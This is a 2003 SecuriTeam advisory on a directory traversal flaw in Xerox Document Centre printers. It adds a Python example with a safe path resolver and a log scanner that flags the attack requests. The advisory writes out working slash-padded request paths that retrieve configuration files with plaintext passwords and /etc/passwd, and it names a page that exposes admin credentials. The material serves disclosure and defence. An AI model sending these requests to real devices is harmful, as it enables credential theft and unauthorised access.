[NEWS] Security Vulnerability in Xerox Document Centre (Directory Traversal)
From: SecuriTeam (support_at_securiteam.com)
Date: 12/22/03
To: list@securiteam.com Date: 22 Dec 2003 12:28:29 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
Security Vulnerability in Xerox Document Centre (Directory Traversal)
------------------------------------------------------------------------
SUMMARY
A security vulnerability has been found in the Xerox Document Centre. The
vulnerability allows remote access to files, access to plaintext passwords
for the HTTP administration interface, access to DES-hashed passwords for the
operating system, and read-write access to HTTP users and passwords.
DETAILS
Vulnerable systems:
* Xerox Document Centre 440DC
* Xerox Document Centre 480DC
* Xerox Document Centre 425ST
* Xerox Document Centre 470
* Xerox Document Centre 255ST
Xerox's web server software for Xerox hardware (it reports itself as
"Xerox_MicroServer/Xerox11") returns a binary dump of a directory when the
requested URL ends with "/.." or "/.". Starting from the document root, it is
therefore easy to build a directory/file tree and retrieve any file.
The server has a directory traversal blocking mechanism in place, so you
cannot climb back past the document root: the web server appears to reject
"../" when it tries to climb back too far.
A request like:
GET /../..
Will return "The request had invalid syntax".
However, a request ending in "/." will not be rejected.
Therefore a request like:
GET /assist/.
Will return an "OK" response.
The server appears to count the "../" groups and compare that count to the
total number of "/" characters in the request, so padding the path with extra
slashes defeats the check.
A request like:
GET /assist/////.././../../.
Will in fact return an "OK" response.
Examples:
Requesting: http://xerox_dc_470.example.com/..
Will return:
00 00 00 00 45 00 0c 00 01 2e 00 00 00 00 00 00 43 ...E...........C
10 00 0c 00 02 2e 2e 00 00 00 00 00 46 00 10 00 06 ...........F....
20 63 6f 6e 66 69 67 00 00 00 00 00 48 00 10 00 06 config.....H....
30 68 74 64 6f 63 73 00 00 00 00 02 26 00 10 00 04 htdocs.....&....
40 6a 6f 62 73 00 00 00 00 00 00 02 29 01 b8 00 04 jobs.......)....
50 6c 61 6e 67 00 00 00 00 00 00 00 00 00 00 00 00 lang............
60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
Requesting:
http://xerox_dc_470.example.com////../../data/config/microsrv.cfg
Will return the configuration file, including plain text passwords.
Requesting:
http://xerox_dc_470.example.com////////../../../../../../etc/passwd
Will return the passwd file (which you can then run crack on).
Even without using "..", you can obtain the plaintext passwords for the HTTP
interface by requesting:
http://xerox_dc_470.example.com/srvadmin/usersecure.dhtml
From that page you can even create new users; pressing the "Apply new
settings" button prompts for the admin password, which is the same password
displayed on that page.
Workaround:
* Disable the HTTP interface
* Restrict access permissions to trusted hosts
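The following added example (written for this edited copy; it is not code from Xerox or from the advisory's authors) models the two halves of the problem described above. count_based_filter() is a hypothetical reconstruction of the weak check the advisory infers (it is not the device's code and is not meant to reproduce every response listed; it only shows why padding a path with extra "/" defeats a counting filter). safe_resolve() shows the correct approach, resolving the path segment by segment and refusing anything that climbs above the document root. scan_log() applies that resolver to constructed Common Log Format lines so an administrator who cannot yet disable the HTTP interface can spot the request shapes from this advisory in a proxy or firewall log. The log lines, client addresses and the LOG_RE pattern are assumptions made for the example.

```python
import re

# Common Log Format matcher (constructed for this example; adapt to your log format).
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)$'
)

# Page the advisory names as exposing HTTP interface credentials.
SENSITIVE_PAGES = {"/srvadmin/usersecure.dhtml"}


def count_based_filter(path: str) -> bool:
    """Hypothetical reconstruction of the weak check: the request is rejected
    only when the number of '..' segments reaches the number of '/' characters.
    Extra slashes raise the right-hand side, so traversal slips through."""
    ups = sum(1 for seg in path.split("/") if seg == "..")
    return ups < path.count("/")


def safe_resolve(raw_target: str):
    """Resolve a request target segment by segment against a virtual root.
    Returns the canonical path, or None if the request tries to climb above
    the document root. Empty segments ('//') and '.' are collapsed, so slash
    padding has no effect on the outcome."""
    path = raw_target.split("?", 1)[0].split("#", 1)[0]
    if not path.startswith("/"):
        return None
    parts = []
    for seg in path.split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            if not parts:
                return None  # would leave the document root
            parts.pop()
        else:
            parts.append(seg)
    return "/" + "/".join(parts)


def classify_request(raw_target: str):
    """Return the reasons a request matches the probing shapes in the advisory."""
    path = raw_target.split("?", 1)[0].split("#", 1)[0]
    resolved = safe_resolve(path)
    reasons = []
    if resolved is None:
        reasons.append("climbs above document root")
    if path.rsplit("/", 1)[-1] in (".", ".."):
        reasons.append("trailing '/.' or '/..' (raw directory dump trigger)")
    if "//" in path:
        reasons.append("slash padding")
    if resolved in SENSITIVE_PAGES:
        reasons.append("credential page")
    return reasons


def scan_log(lines):
    """Yield (client, target, reasons) for every log line that looks suspicious."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        reasons = classify_request(m["target"])
        if reasons:
            hits.append((m["client"], m["target"], reasons))
    return hits


# Constructed sample log; the traversal targets are the ones quoted in the advisory.
SAMPLE_LOG = [
    '10.0.0.5 - - [22/Dec/2003:12:28:29 +0200] "GET /index.html HTTP/1.0" 200 512',
    '10.0.0.5 - - [22/Dec/2003:12:28:31 +0200] "GET /assist/////.././../../. HTTP/1.0" 200 4096',
    '10.0.0.5 - - [22/Dec/2003:12:28:40 +0200] "GET ////../../data/config/microsrv.cfg HTTP/1.0" 200 1200',
    '10.0.0.9 - - [22/Dec/2003:12:30:01 +0200] "GET /srvadmin/usersecure.dhtml HTTP/1.0" 200 2048',
]

if __name__ == "__main__":
    for target in ("/assist/.", "/assist/////.././../../.", "////../../data/config/microsrv.cfg"):
        print(f"{target!r}: weak filter accepts={count_based_filter(target)}, "
              f"safe_resolve={safe_resolve(target)!r}")
    for client, target, reasons in scan_log(SAMPLE_LOG):
        print(client, target, "; ".join(reasons))
```

The segment-wise resolver is the important part: it never looks at raw counts, so "////../.." and "/../.." are treated identically, and a request that pops an empty stack is refused before any filesystem access. The scan function is only a triage aid; the workaround above (disable the interface or restrict it to trusted hosts) remains the fix.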
ADDITIONAL INFORMATION
The information has been provided by J.A. Gutierrez <spd@shiva.cps.unizar.es>
and Brandon Pierce <brandonp@insynclh.com>.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.